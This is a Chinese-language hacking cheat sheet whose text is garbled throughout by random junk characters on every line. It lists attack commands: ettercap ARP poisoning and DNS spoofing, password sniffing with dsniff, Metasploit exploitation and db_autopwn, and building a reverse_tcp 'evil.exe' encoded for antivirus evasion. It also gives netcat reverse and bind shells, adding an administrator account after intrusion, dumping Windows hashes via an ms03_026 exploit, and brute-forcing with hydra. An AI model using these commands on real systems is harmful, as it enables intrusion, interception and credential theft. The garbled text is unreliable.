whois 域名/ip 查看域名的详细信息。
3 E# q5 [- i2 q, x 0 T* @0 l. o0 e
ping 域名/ip 测试本机到远端主机是否联通。/ N; e8 k' e$ R1 i2 d9 |# r
- S0 Z6 m4 Y" p& A0 _1 g* b
dig 域名/ip 查看域名解析的详细信息。& ~4 n1 d5 l" {3 v
0 [9 T, f( |% h6 U9 c& z! nhost -l 域名 dns服务器 传输zone。% @: C( v _8 e$ }+ Z
! c9 \8 Q, V8 u扫描 p8 i7 [- _3 G( s* T* n1 E4 V8 Z1 e
( h5 b% s6 M# p9 a& a: r" Snmap:: u1 g& k% s( T$ [& d
; M x; j! a h" K2 |
-sS 半开扫描TCP和SYN扫描。
) N& x% R4 X& s; x: t& n g
) u! s# M3 ] z, D, V-sT 完全TCP连接扫描。& F7 x0 ^( |- S5 N/ W
" h0 Z4 w y0 j! h- x4 I-sU UDP扫描# w g& }% G; |9 P1 P6 w. p3 c
) n6 ?, T! Z8 b) G-PS syn包探测(防火墙探测)$ g: _. c2 Z; h7 V9 v; m# [6 C
; U( o) x$ C Z4 g; }- f
-PA ack包探测(防火墙探测)
4 e5 F0 M5 }. U! K1 a
9 A, i% y4 h. f6 x5 `4 w( T-PN 不ping。
1 v# |7 h% p8 d4 J
2 v8 Z* Q9 ]+ E2 b" P& C+ q-n 不dns解析。/ _3 C, c4 A: }
- v0 `# l4 c7 Y& g-A -O和-sV。
3 Q' `/ X7 c) A. r* {8 ? 9 x# r3 \+ u/ f3 c4 D: p9 i
-O 操作系统识别。1 u5 a1 _' V6 s$ S4 M0 f
( c: z1 P, b6 B( w8 e
-sV 服务版本信息(banner)
/ P/ v7 s# [6 s 3 ]% L2 m- U, g; R
-p 端口扫描。
1 L ~2 |# ?0 V- }
* u" n. @! d( y6 B3 U-T 设置时间级别(0-5)
+ j6 v$ w( L& v# W2 J m& R* S7 V
1 ~) A8 W: Z) U, l-iL 导入扫描结果。
" z2 J2 s, P. a0 c # l7 A* L d' t. s, Z5 d
-oG 输出扫描结果。
/ _3 \, b, S9 i $ K5 [; ~+ p) L8 w, D! @* i; U# }
' @$ M, M- q1 Z
. g6 ~# X/ F; X操作系统识别:7 p0 l2 L/ Q8 l g2 m- L' B& U
1 A) k" U3 J0 y8 H. }3 E! O
p0f -i eth0 -U -p 开启混杂模式。
8 |5 F. n2 B% O1 u" f % R% f, J6 { |+ L
xprobe2 ip|域名 检测os。
5 j$ c% m. y) O; U6 B* \
0 e8 H/ W! w# q. p4 `- i' V/ _banner获取:7 T) F# V6 o# K. Y6 u
& M. ?1 a4 [, H0 C4 n: E5 V
nc ip port 检测端口是否打开。; G8 e* e9 ]$ s0 q i2 T: @) W
) G, v4 K3 ^; f8 Utelnet ip port 检测端口是否打开。
( m1 |/ ?( r+ X: |( |
' v, V+ b: b5 ?' {" iwget ip 下载主页。( c3 ]) s. o. t& e2 `
~' C7 g- R( B o6 F) A, kcat index.html | more 显示主页代码。
& C3 _3 e/ v Q X
2 t. ?2 _ I( b# p; }; \) P. Iq 退出。
8 r4 H9 S% Y$ a* A
e: E+ `6 w( u* n1 X: e. Nwindows枚举
' F9 I( L6 e: m, N( d 4 N/ Q, r g; r% t: b" g) U
nmap -sS -p 139,445 ip 扫描windows。2 m$ e& Q+ Y8 m
+ h V, {! x' K& U
cd /pentest/enumeration/smb-enum
! z- @ n* g. n! F6 T7 S* k $ f4 z6 m, v5 Z7 z4 z: y$ p
nbtscan -f targetIP 检测netbios。
- L# d; Y, V8 |/ k1 a3 r 0 P6 Y- ~- P5 J3 Y- R
smbgetserverinfo -i targetIP 扫描name,os,组。
# }, d7 Y! K" G v: D
+ M6 i4 N+ h: L; H$ [smbdumpusers -i targetIP 列出用户。7 n2 N) g1 q7 w2 A2 m6 [
, @7 r+ n! T$ Xsmbclient -L //targetIP 列出共享。) |- L- m- e# ^
9 H1 X! _. ^0 T使用windows:
1 S% |9 ~7 @0 R& o8 X$ z" j
7 B1 k3 U* q3 u# I7 d, k, x/ m, `net use \\ip\ipc$ "" /u:"" 开启空会话。2 Z9 A* N+ u. N8 C1 o5 @
, a. i5 q5 R. nnet view \\ip 显示共享信息。
) u& o1 y$ s* p6 j8 ]7 R; e
: R' b0 e9 `! x5 I9 Y) @" zsmbclient:& N' D( i' L9 O+ k! A, U0 Q
1 G1 u9 O1 L1 o: A2 I) s
smbclient -L hostName -I targetIP 枚举共享。7 y, \! o) T4 K5 b
( k6 d* G$ a2 u, j
smbclient -L hostName/share -U "" 用空用户连接。
# A Z, q$ o. w [ 2 [) q7 }% f2 A j1 z- c" L! j7 I
smbclient -L hostName -I targetIP -U admin普通用户连接。5 W$ u2 ^. g/ }. F: X1 j, j
+ ~) x" Q% {4 s& p! T
rpcclient: ! m- ?8 J. ]2 l$ S3 ]3 ~
3 T' u9 G8 W5 n" c2 m4 b; s' s* _rpcclient targetIP -U “”打开一个空会话。3 [! P r9 L' L8 Z% Y3 r, W2 y8 G# E
3 h% B3 G0 ^8 X! Qnetshareenum 枚举共享。
4 b; Q: [4 K- M3 n6 f( f. ]
* R0 r: R$ d: O G |9 }/ Senumdomusers 枚举用户。
/ i6 S [0 J6 v, ]$ F
4 m/ i. E% N) u: ~! c$ h+ {5 Ylsaenumsid 枚举域SID。 @- Z0 r3 M% s* `2 _' D
4 _- j8 Z: g" c+ L5 ]' }- i' |' qqueryuser RID 查询用户信息。
! ^4 j% M( x( m" M5 d0 z
) h3 U# t+ c6 C6 b; ccreatedomuser 创建用户访问。2 a( P. y0 _ x2 `5 R5 @/ G
! ^% l" a; ?( n& c0 Q
ARP欺骗:
/ E L6 |$ f! a% e7 r' U
) I7 D j/ X! {# s8 O6 m3 Dettercap:
, _ S' t, _, H! e' ]2 S " D& k. N' a* X
nano /usr/local/etc/etter.conf配置文件1 g$ n6 n' ?! B4 E4 G7 |2 u
$ b8 X3 B5 ?0 v3 W, XSniff > Unified sniffing > Network interface: eth0 > OK 设置抓包的网卡) A% m- G, g8 d3 ~
) Y, X; W, b9 \
Hosts > Scan for hosts (do this two times)扫描网段的主机: A% |: V9 Q. G* C
0 p" o* s5 C/ o% F6 \9 t' x* h
Hosts > Hosts list 显示主机列表' B6 S9 V! t) U+ ]& m
' E `8 @4 s. q8 l$ o$ M& c
Select the default gateway > Add to Target 1 添加主机1 q8 O( _! |/ b
# y& \( k- l& w' C0 X! }4 b
Select the target > Add to Target 2 添加主机* s- h6 a3 \: k4 G! x: u+ K
6 X( x% T% P& t4 M5 G; cMitm > Arp poisoning > Sniff remote connections > OK 设置ARP攻击" W( [" O, J. u! N
2 V% o4 S( q' j9 b! |6 iStart > Start sniffing 开始攻击
1 x5 ]2 P! b$ K/ D/ y2 `: B
9 Z# s3 }" E" Fdsniff -i eth0 监听网卡窃听登录用户密码. v/ M; h& a& X& Q$ R2 P& }
7 _7 c3 u; K6 O6 Surlsnarf -i eth0 嗅探http请求
1 E# x9 u1 N) ~: Q" L0 [( S7 @ 4 \: l& b. A1 {1 j% b( \5 I% \) T
msgsnarf -i eth0 嗅探聊天软件的聊天内容, y! D& X* o0 G8 R" M% q# A7 ^. X
# `. C/ C( Y! w$ p5 b# | Edriftnet -i eth0 网络管理嗅探图片,音频。
2 g) z) T8 G. l# I 2 ^+ |, K3 ?# B- I* G* l: t! F- g
nano /usr/local/share/ettercap/etter.dns编辑配置文件
8 F1 [9 J* j9 G$ F
! ?$ M9 o$ @( V. N8 f. e" KPlugins > Manage the plugins > dns_spoof 设置dns欺骗9 x" A5 {) C$ ?5 @$ ^) u
4 Q0 \5 g9 z8 j2 V
Mitm > Arp poisoning > Sniff remote connections > OK 设置ARP
5 W! e" m1 N" y) p 6 C3 I5 S) z2 k. P6 O. u
Start > Start sniffing 开始攻击
4 S; N$ X% E \: L0 c + S1 l; I* [( a4 F% B/ G
! T1 K. }3 r; P `- ?; h# e Z
2 l6 a$ K% ?: A; F; ~Exploits漏洞利用:1 G7 n, y! o* z$ z6 D
0 U7 R% U9 e/ x. q1 lcd /pentest/exploits/exploit-db 进入目录
, n$ p3 x* x" [
- U5 {" C1 O( \" T+ f- K( N, rcat sploitlist.txt | grep -i [exploit] 查询需要的漏洞
( ~' i4 D: J7 I' Q, o* P' J4 v , b, \+ H( E0 Z# G+ K
cat exploit | grep "#include"检查运行环境
: y) E( V- R" ^6 k+ a$ | ( G5 J) U; I! p( o. m! A" v. ~$ L
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u只保留可以在linux下运行的代码5 @3 r- F9 y% q
8 s7 v. R0 d6 r$ a! q$ `" U
9 d- s! v- G5 f- M
. ~2 A" R# I% T6 a$ rMetasploit:
; f) ]2 Z1 f! w" C8 a3 [ 8 ^4 E0 Q, E, @1 o& J
svn update 升级 ; k5 f6 W1 Q7 O* |1 i
# X7 |1 F! |' S/ K& |2 I./msfweb Web接口127.0.0.1:55555。.
7 ~% x" r- T8 @8 e3 o$ j* p . e& q& O# G2 i$ Z! c: X
./msfconsole 字符下的Console。
' M! Z' B- J' m) g7 V) ^8 J9 O& s + X* }/ V- L1 D Z3 ?- p5 w
help 帮助
- @0 r' a5 w; F# `5 M. M1 D ! j. Q @ X: g0 }
show <option> 显示选项 N { t2 R3 I5 g O9 ?' O8 c
/ }8 \! H* H7 l0 u2 h+ A3 g6 S! ksearch <name> 搜索名字
9 d% p: Y3 H: `0 y0 s; Y
; f' g! e% X3 Z1 euse <exploit name> 使用漏洞. A4 x$ G/ o! p$ c# H: c
$ u8 h0 Q+ m. K7 G0 A% Fshow options 显示选项
* h% Q6 Z6 \8 [. K, V- B5 ~
9 _1 |6 n6 u, f! G7 i3 t* ?* nset <OPTION NAME> <option> 设置选项
, J9 T' { ]( `8 z / P* R$ I, W. w% k" c! G
show payloads 显示装置
- M1 o( b8 E5 ^5 {- }/ w d- B/ g- T
& W; S9 |: z" O5 G8 zset PAYLOAD <payload name> 设置装置
* r X) J7 ?& y+ F
3 I7 J& z" k$ b' K9 ]% Eshow options 显示选项
6 D' }4 r* q5 H4 G$ A6 D7 A ; g4 p+ c. a [0 ~4 N: H6 ~
set <OPTION NAME> <option> 设置选项% C |: T! n/ Z9 r% C" I6 [
) J. x# S# J- T0 X4 `) rshow targets 显示目标(os版本) y, ?6 s5 S& c9 d6 B! `3 P
$ X) w- S, D, J$ u0 u
set TARGET <target number> 设置目标版本
, M$ O0 I! U1 q' {: x 4 ]! W# n1 C: f0 [) G H! L4 e. H
exploit 开始漏洞攻击: l8 }/ n5 O- S1 k \+ A
* ]3 d; c$ N" u* Asessions -l 列出会话
! i5 R2 A7 O7 W7 B9 s 0 |7 [: K0 F3 O2 T/ x1 n
sessions -i <ID> 选择会话! B: m$ U: Z- f& g' q0 [: i! Z
; m6 n* V9 X9 u( `
sessions -k <ID> 结束会话+ \, h6 @" f Y( N9 `0 P, G* k
0 w3 e% x3 r. D( F4 O<ctrl> z 把会话放到后台+ T* v6 O9 x; O. A# R5 ?8 @
/ X; J% m5 a a% S- B
<ctrl> c 结束会话
- O9 _9 m% m7 W 4 o7 F5 J2 w& v0 |+ s
jobs 列出漏洞运行工作
+ [3 s* t2 D* h : i5 P& }, d$ x
jobs -K 结束一个漏洞运行工作( K, Z6 Y1 a. C# J( I2 M1 A
( t( P. d. L# m" |* w3 `show auxiliary 显示辅助模块
! S2 B# f, z8 c ' w/ H/ c6 U8 x1 h& `" G- Z" d
use <auxiliary name> 使用辅助模块
/ ]+ o! u2 }* H2 x) I" L E, a
/ H5 e. \2 O6 `4 {set <OPTION NAME> <option> 设置选项
9 p2 p1 O. {* [4 x/ a + Y% n/ k5 O8 l
run 运行模块7 T- f' n' |$ a. B, G
! J7 _# |# R" N7 @9 S, e
scanner/smb/version 扫描系统版本 ^1 ^2 T6 r; T E1 v, a
9 `3 S0 i4 O, j+ N$ m
scanner/mssql/mssql_ping 测试mssql是否在线0 ?2 O, k1 E8 Z! f4 y& n
! s% B, r3 p& y& K$ G! t% h
scanner/mssql/mssql_login 测试登录(暴力或字典)
$ K8 b+ {9 `- G; U/ `- b4 _4 u + r! i- l# K; ]+ ~
Attacker behind firewall: bind shell正向
* o3 L P9 _7 B8 P: ~
_ A4 R4 j; v8 j0 FTarget behind firewall: reverse shell反向
6 w0 ]* \; p% `
2 D. |$ ?: Q0 ~8 rMeterpreter衔接不懂dos的可以用这个:
) r9 y4 T7 R& z( Q' a% @
1 |/ H* l9 @: tdb_import_nessus_nbe 加载nessus的扫描结果% T! K B1 j# X9 X
) N; H" Q2 V$ o, k
db_import_nmap_xml 加载nmap的扫描结果9 ?% y% W7 ]" j' |+ |
5 v2 ~1 i0 l. {0 W5 C自动化攻击流程:
1 z1 ^0 |$ i5 \5 K" X* G
, h0 g1 g( h* G2 @# L; B$ ycd /pentest/exploit/framework3
5 h5 d K; ?$ } 9 B: F( w% t. z3 J& w+ W& h
./msfconsole
8 p4 H. A- E' h* l
. m; U ^" \ K$ jload db_sqlite37 }: I$ Z! U' O6 @
, I8 y. J P8 x0 L, i# J2 |8 B
db_destroy pentest$ E$ I S6 K: {& ~/ d. [: v6 h
9 b( ~% m, v2 o# |' M' s; l ~! @' W
db_create pentest
& P R" K7 \- [" w1 s' {6 P
. l# x( \# l* r8 g0 o# Cdb_nmap targetIP# K" [8 U% E: P f- k4 S
# a5 m; L* S$ ^9 @( u
db_hosts
- ~. U, b2 v& X" E0 z: Z E3 { 1 m4 I- c8 b, |. r; a l
db_services9 n7 |& e& }% `+ ]1 E2 u5 ~
- e; u: d( G' q% I( ]db_autopwn -t -p -e* G! {0 W* b$ b
" C4 P" {6 @/ t3 _* z6 c3 g
字符接口攻击流程:# i+ b1 T- k/ V* c" D5 S
. @5 H# q8 d' W$ X1 i$ P3 h' U
./msfcli | grep -i <name>5 L# l$ M% p7 E6 ?& Y8 m% Z
: T! I. z8 f8 Y+ P; D) R. x& R* P" f- {, a
./msfcli <exploit or auxiliary> S
, K% q0 w6 d4 T) U ( B, Q( k; T# C! h& V- E. U2 b
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E. S; [; @) O0 z( r: Q" Q1 J
, o6 V& S! C2 X: t' u做木马后门等:; Z' ?0 l1 [! a0 j* T
& V, Z2 a7 F1 O$ R
./msfpayload <payload> <variable=value> <output type>2 X0 ^3 L$ M. |. P z3 V
* f. K' x3 t5 t) U$ L8 |S summary and options of payload% J9 s& T; W( w
+ }7 W. [0 s3 z# T; v, \# uC C language: u) O8 e! A( S+ L! q
! K1 e# l0 {" N# y- g; w
P Perl
2 B. \+ I4 D; P7 @$ h5 I( `) W+ a ( d& {1 M) Z ^$ W( T$ r- p
y Ruby
$ a- P3 x9 E$ Z9 o6 X
3 g, J% z7 @6 G+ \6 u' x2 x' p, pR Raw, allows payload to be piped into msfencode and other tools. b8 C: l. B1 u7 | w' s
( ` N( h3 r. K* V, W* Z
J JavaScript
! Z# [0 o, B8 r% q0 s ( l0 R% R$ h4 d) g7 g) ]: h) I
X Windows executable8 a, M- Z1 y% C2 x! J+ p
" Z. p: ^+ ]: W9 q6 Y( F$ x
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C- D6 a+ x" b6 s& \8 S2 a2 _" w
: Q$ Y7 Y4 a3 a; L8 w; u& V
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe5 E V- p9 s$ {
: f# w) a1 V0 g3 C编码处理就是做免杀:% O' j$ ?! X/ |" G6 j" ]5 C- q8 B
* F6 a+ Z% L# R# E" V0 M6 l6 i./msfencode <options> <variable=value>
, G( M. a4 C) k0 u6 @- H' c 1 m8 T- o" w/ `# E
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -l
0 |( W' V0 `$ t& N 9 ~3 ^" I( y$ u5 S' I; B' a
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -e PexFnstenvMor -t c
# W) g$ r; U& H# b! y
/ S! k7 k. @& }! ^ ! w, R1 s# S* h5 E
2 l' j( m3 z3 W; g1 w4 j
入侵后在windows下添加管理员用户:% n! j2 \9 t2 M* @1 v
9 _. q8 h+ L. _: A
hostname 查看主机名
4 U& T+ B" b8 l5 T2 x: r ; Q9 t- a" d8 W! @! q, c
net users 查看用户
* A5 n& u9 d& y# y4 @2 m + W/ I+ l/ {' d
net user 用户 密码 /add 添加用户
1 A4 R" z7 ^* p9 C @1 z" x3 b; X6 e8 B( `# N1 S# J2 S
net localgroup 查看工作组% S" w! [5 `) Z
) N4 `+ p' o$ q4 k% ^net localgroup administrators 查看管理员组
0 @9 b, H7 ?& O5 P# N+ m1 D
5 t+ @! t) h. n$ {8 Mnet localgroup administrators x /add 将用户加入管理员组
9 T; E+ r$ d0 I
, g' O. R2 I; R+ c
7 O3 `" E5 |5 D- t* z( q2 w; z7 F: G
; m0 |* C, e1 ]; sTFTP8 ]: D6 e, @6 q( F) y) i0 J. V
. s( n/ h9 t. N& J; ?( K
cp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上
2 c: ]# n7 s4 N; e ) ~/ }) l, c* Z, I
tftp -i 10.1.1.2 GET nc.exe下载8 [+ O6 g- k9 [7 o( E" \( [
2 }/ m# J+ I; m, G
netcat瑞士军刀
5 z+ {0 @* R( A3 i. ], }
2 _0 x0 K- J; q9 Aattacker: 10.1.1.1 % w G0 B; k( S9 |1 k2 z$ E
3 b1 w/ ~' s' Q. r- vtarget: 10.1.1.2
7 S1 m5 y4 K( n- j
Q* F& \( r# ^" mnc -v -z 10.1.1.2 1-1024 端口扫描
3 O- e# H1 W5 W) F
# c5 g7 r& x/ t% r) Vtarget: nc -lvp 4444 聊天设置(服务)4 f$ g/ H* L' a$ U) ~9 S8 ?+ X
0 O( ~! A% a7 |4 {6 |7 rattacker: nc -v 10.1.1.2 4444 聊天设置(客户)3 O1 h; U. \4 r; R. W2 j4 v- A
* X9 Z; L) t! w- K7 a! T
target: nc -lvp 4444 > output.txt传输文件(接受)
' G* ]/ n3 n; W+ x% M/ r9 k 2 Q! \: a1 K& u' x e) J! K1 B
attacker: nc -v 10.1.1.2 4444 < test.txt传输文件(发送)" F3 m5 o* f' I A& R: v
4 z0 T7 s l- a# [( S0 h. _5 O/ F
target: nc -lvp 4444 -e cmd.exe Bind shell。
' ]! G8 X6 w$ l7 C
$ L/ @9 X; k( K, X& `# Vattacker: nc -v 10.1.1.2 4444
- a6 L0 J1 i1 z1 T% { Z
5 q6 X$ R/ a* f9 k. c# W; vtarget:nc -lvp 4444 Reverse shell。- ? C# P6 U2 r n
* V* \: s1 Q, D: ?
attacker:nc -v 10.1.1.2 4444 -e /bin/bash8 p( g0 c* |) B& A
/ u, D6 B2 M) I* n$ Q1 N" v
' Q# b. E2 X" w! O" v! x
! Z, t- N4 f2 q- t密码
! z' j4 E1 w" g
. r9 m* c2 W+ Z' k2 S# j字典zcat /pentest/password/dictionaries/wordlist.txt.Z > words0 i- F+ w, }: h& M) l, m0 T% v8 H: z
+ }' \3 @8 x: a! c
cat words | wc -l显示个数(30多万个) : \% l1 z1 K3 d' w5 O3 g- L
* j4 \8 f: Q# v9 @$ ^3 |
暴力:
0 n( t B6 g- D" f
/ n1 e# w2 W" p3 D! W* Dhydra -l ftp -P words -v targetIP ftp 攻击ftp。
( ]" n5 c9 G4 [ 4 P Y# L- v8 R6 w, M
hydra -l muts -P words -v targetIP pop3 攻击pop3
7 t0 o% A8 g$ H$ l$ s
) s/ }, Y+ G0 k* D* R3 {hydra -P words -v targetIP snmp 攻击snmp m; L% W1 X% q* y4 W
: }) k& s/ ]) A3 s攻击microsof VPN' e1 a# W( h; Q- U
8 z8 l$ \( n7 |+ b
nmap -p 1723 targetIP( B( q& T) Y, E' t# M P
: a0 M- g; H: E' d
dos2unix words% v" F/ Y2 a/ _4 Z$ K; d/ C
8 O0 K) v+ s$ ?, H+ T+ [cat words | thc-pptp-bruter targetIP
4 o+ H9 D+ X% f. o$ S! n# ~
" h' g' {- b) m2 |WYD:
8 K" M- S3 S/ q! I1 a
# W/ a5 H3 H. w+ d1 m' Swget -r www.target.com --accept=pdf 下载pdf文档( e2 x* L+ B! o0 u2 ?( K
9 c A4 w( W0 [$ T1 @: L4 m2 U% ~
wyd.pl -o output.txt www.target.com/
2 j: L! T; V, [
/ O$ v/ e K2 P6 t2 Z+ W% C0 |cat output.txt | more
3 Z7 ]* I& I4 ~5 @8 g+ G. _
9 }; e4 n6 s7 b) d& P$ ?* T6 ?SAM文件(windows下的密码文件):4 ?; Z! j! E' M. G% R. X' r1 B8 D
9 `; B4 \9 M; s8 m: e! F1 A' |" q
%SYSTEMROOT%/system32/config) |$ A+ j/ e/ `0 u4 t
: ~8 Q0 u) [" u8 P1 P
%SYSTEMROOT%/repair
: y( U( D& x9 ^$ n( d# P4 j& y) c , Y0 s) L7 C# o6 ?' F# B$ B: V
备份windows的hash文件:
& a; J4 S: y" w: a
" h6 S$ I5 e2 S/ T! \7 W./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
+ R, ?$ }8 t* Y+ \$ S* d$ r
& h5 a8 l# B! D0 |) o7 |% Ymeterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\
6 \! d v- x: v/ o9 H
# q( `& J+ z! R6 b4 ~0 Y h; }meterpreter > execute -f cmd -c
, L& c \4 p8 J* K9 B+ b/ f. V
4 L3 C' N6 T. \. `8 Pmeterpreter > interact x
7 x% q! C& q' F9 W z5 c 1 v3 f x2 z* K. u/ N, _( Z* u
C:\WINDOWS\system32> pwdump \\127.0.0.18 j3 y* J5 m1 E5 P4 F9 r
, y/ _+ _ u, F
john破解密码:
2 k* L' z2 k1 p: f7 D5 _( V, X 4 n( k5 |- i0 j( J. T
cp hash.txt /pentest/password/john-1.7.2/run/7 \5 }; n$ J* z# z4 ]
7 I' J {$ N8 D5 H) I
cd /pentest/password/john-1.7.2/run/
' l; V- G2 n ~0 H 7 c6 l3 a, W# j T- v
./john hash.txt8 P4 A- w! V$ O" T( d
2 N1 s! j, r" l1 E$ ^1 c
彩虹表:, i0 d( `2 z# X/ s$ F$ h" C
" i; q0 f! M. Z7 l( a, M8 _7 Ercrack *.rt -f hash.txt* t# v% ` ~+ N( R+ C
7 }; b+ r' }$ [' l$ s' S& Z
& Z9 G9 r: ?9 I" P2 i * l0 Z; G \( Z- k5 A& s
本地修改密码:
& R3 M; N$ X3 G9 C% w. P3 D " v# A) X3 j6 i, ^: \
mount& n) R& K4 P3 F- U2 [0 H
* _. r. d# e! m" E( _- X' @5 g- q
umount /mnt/hda1/ H( @0 [6 [4 Z- }6 V0 ~. f, D
3 g' M) Z1 a( N% K6 H9 i
modprobe fuse" j" S* X( f7 y2 F
' w6 e6 r0 O$ T' r& d* Kntfsmount /dev/hda1 /mnt/hda1
$ M$ v6 S) f7 r3 ]0 ^* S
# l/ o$ s! l$ Q3 O. G! B `7 W- |mount |
|